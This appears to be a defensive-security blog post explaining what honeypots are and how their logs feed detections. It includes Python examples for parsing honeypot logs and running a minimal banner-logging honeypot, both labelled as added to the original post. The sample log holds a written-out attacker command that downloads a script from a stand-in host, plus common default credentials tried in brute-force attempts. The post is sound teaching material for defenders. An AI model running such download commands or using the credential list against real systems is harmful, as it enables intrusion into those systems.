Honeypots Explained: In the Wild and in SecOps

A honeypot is a system deliberately configured to look vulnerable so that unauthorized interactions with it can be logged and studied. Internet-facing systems are under constant automated attack, so any port open to the internet is a bridge through which outside parties can interact with your system. When we leave our honeypots out, we mimic the signs of a vulnerable system in the hope that attackers come in and try to execute their attacks. Think about that next time you're looking at a vulnerability report. 🙇

Honeypot Uses

Honeypots are used to collect data on attacker behaviour. The attack source, the techniques used, their success or failure rates, and malware samples can all be extracted from honeypot logs. Security teams can act on intelligence sourced from the analyzed data: patterns seen in the attacker's behaviour are turned into detections, so that the same behaviour showing up in production security logs raises an alert. This gives security teams a unique opportunity to proactively blocklist suspicious sources and behaviours before systems are infected.
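To make that concrete, here is an added example (not code from the original post or from any honeypot project) that runs over a few constructed JSON-lines records loosely modelled on what an SSH honeypot writes. The field names, the documentation-range IPs and the values are assumptions for this example. It pulls out the things the paragraph lists: sources, credentials tried, success versus failure per source, commands run and payload downloads, then turns them into a blocklist and a handful of indicators to hunt for in production logs.

```python
import json
from collections import Counter, defaultdict
from urllib.parse import urlparse

# Constructed sample data: JSON-lines records loosely modelled on what an SSH
# honeypot writes. Field names, IPs (documentation ranges) and values are
# assumptions made for this example, not output from any real honeypot.
SAMPLE_LOG = """\
{"ts": "2024-01-10T02:14:03Z", "src_ip": "203.0.113.7", "event": "login", "user": "root", "password": "123456", "success": false}
{"ts": "2024-01-10T02:14:05Z", "src_ip": "203.0.113.7", "event": "login", "user": "root", "password": "admin", "success": false}
{"ts": "2024-01-10T02:14:07Z", "src_ip": "203.0.113.7", "event": "login", "user": "root", "password": "toor", "success": true}
{"ts": "2024-01-10T02:14:09Z", "src_ip": "203.0.113.7", "event": "command", "input": "wget http://198.51.100.9/x.sh -O /tmp/x.sh"}
{"ts": "2024-01-10T02:14:10Z", "src_ip": "203.0.113.7", "event": "download", "url": "http://198.51.100.9/x.sh"}
{"ts": "2024-01-10T03:01:44Z", "src_ip": "198.51.100.23", "event": "login", "user": "admin", "password": "admin", "success": false}
{"ts": "2024-01-10T03:01:45Z", "src_ip": "198.51.100.23", "event": "login", "user": "pi", "password": "raspberry", "success": false}
{"ts": "2024-01-10T04:20:00Z", "src_ip": "192.0.2.55", "event": "login", "user": "root", "password": "123456", "success": false}
this line is not JSON and should be skipped, not crash the pipeline
"""


def parse_log(text):
    """Parse JSON-lines honeypot records, skipping lines that are not valid JSON."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            records.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # worth counting in a real pipeline, but never fatal
    return records


def summarize(records):
    """Aggregate per-source behaviour plus a global tally of credentials tried."""
    per_src = defaultdict(lambda: {"attempts": 0, "successes": 0, "commands": [], "downloads": []})
    creds = Counter()
    for r in records:
        s = per_src[r["src_ip"]]
        event = r.get("event")
        if event == "login":
            s["attempts"] += 1
            creds[(r["user"], r["password"])] += 1
            if r.get("success"):
                s["successes"] += 1
        elif event == "command":
            s["commands"].append(r["input"])
        elif event == "download":
            s["downloads"].append(r["url"])
    return dict(per_src), creds


def blocklist(per_src, min_attempts=2):
    """Sources to block: anyone who got in, or anyone brute-forcing past the threshold."""
    return sorted(ip for ip, s in per_src.items()
                  if s["successes"] > 0 or s["attempts"] >= min_attempts)


def indicators_from(per_src):
    """Indicators to hunt for in production logs: payload URLs and the hosts serving them."""
    iocs = set()
    for s in per_src.values():
        for url in s["downloads"]:
            iocs.add(("url", url))
            host = urlparse(url).hostname
            if host:
                iocs.add(("host", host))
    return sorted(iocs)


if __name__ == "__main__":
    per_src, creds = summarize(parse_log(SAMPLE_LOG))
    print("block:", blocklist(per_src))
    print("top creds:", creds.most_common(3))
    print("iocs:", indicators_from(per_src))
```

The threshold in `blocklist` is deliberately low for the sample; on a real sensor you would tune it, and you would still review anything that reached a successful login by hand before pushing the block to production, since a single honeypot hit is not the same as a confirmed intrusion elsewhere.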

A honeypot of mine that got a bit… funky.

Honeypot Characteristics

Honeypots share common characteristics regardless of type or service:

  1. Honeypots are intended to be interacted with by unauthorized parties.
  2. Honeypots log unauthorized behavior.
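Both characteristics fit in a few dozen lines. The following is an added example, not code from the original post or from any honeypot project: a minimal low-interaction TCP honeypot that advertises a fake SSH banner, records who connected and the first bytes they sent, and executes nothing. The banner string, the in-memory event list and the `probe` helper that plays the attacker's scanner are all assumptions for this example.

```python
import json
import socket
import threading
import time

# Added example: a minimal low-interaction TCP honeypot. The banner and the
# in-memory log are assumptions for this example, not any project's defaults.
BANNER = b"SSH-2.0-OpenSSH_7.4\r\n"
EVENTS = []                     # in-memory log; a real deployment writes JSON lines to disk
_EVENTS_LOCK = threading.Lock()


def log_event(record):
    """Append a timestamped record. Nobody is meant to connect, so every hit is logged."""
    record["ts"] = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime())
    with _EVENTS_LOCK:
        EVENTS.append(record)


def handle_client(conn, addr):
    """Send the banner, capture up to 1 KiB of whatever the peer sends, then close."""
    record = {"event": "connect", "src_ip": addr[0], "src_port": addr[1], "first_bytes": ""}
    conn.settimeout(2.0)
    try:
        conn.sendall(BANNER)
        data = conn.recv(1024)
        record["first_bytes"] = data.decode("utf-8", "replace")
    except (socket.timeout, OSError):
        pass                    # scanners often disconnect right after grabbing the banner
    finally:
        conn.close()
        log_event(record)


def start_honeypot(host="127.0.0.1", port=0):
    """Bind (port 0 = pick a free one), accept in a daemon thread; return (socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(16)

    def accept_loop():
        while True:
            try:
                conn, addr = srv.accept()
            except OSError:
                return          # listening socket was closed: shut down
            threading.Thread(target=handle_client, args=(conn, addr), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def probe(port, payload, host="127.0.0.1"):
    """Play the attacker's scanner: connect, grab the banner, send a payload. Returns the banner."""
    with socket.create_connection((host, port), timeout=2.0) as c:
        banner = c.recv(1024)
        c.sendall(payload)
    return banner


def wait_for_events(count, timeout=3.0):
    """Block until at least `count` events are logged (or timeout); return a copy of the log."""
    deadline = time.time() + timeout
    while time.time() < deadline:
        with _EVENTS_LOCK:
            if len(EVENTS) >= count:
                return list(EVENTS)
        time.sleep(0.05)
    with _EVENTS_LOCK:
        return list(EVENTS)


if __name__ == "__main__":
    srv, port = start_honeypot()
    probe(port, b"SSH-2.0-libssh_0.8.1\r\n")   # a simulated scanner identifying itself
    for ev in wait_for_events(1):
        print(json.dumps(ev))
    srv.close()
```

Note what it does not do: it never parses the client's bytes beyond decoding them for the log, so there is no protocol surface for an attacker to exploit on the sensor itself. That is the trade-off of low interaction: you learn who is knocking and what they send first, but not what they would do once inside.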

Honeypot Categories

There likely already exist honeypot solutions for your specific industry and for the services used within your organization, or even in your home network. I found that FOSS honeypots vary on two major dimensions: interaction level (how much of a real service the honeypot emulates) and the service offered.

I write about DFIR, GRC, and defensive security topics.
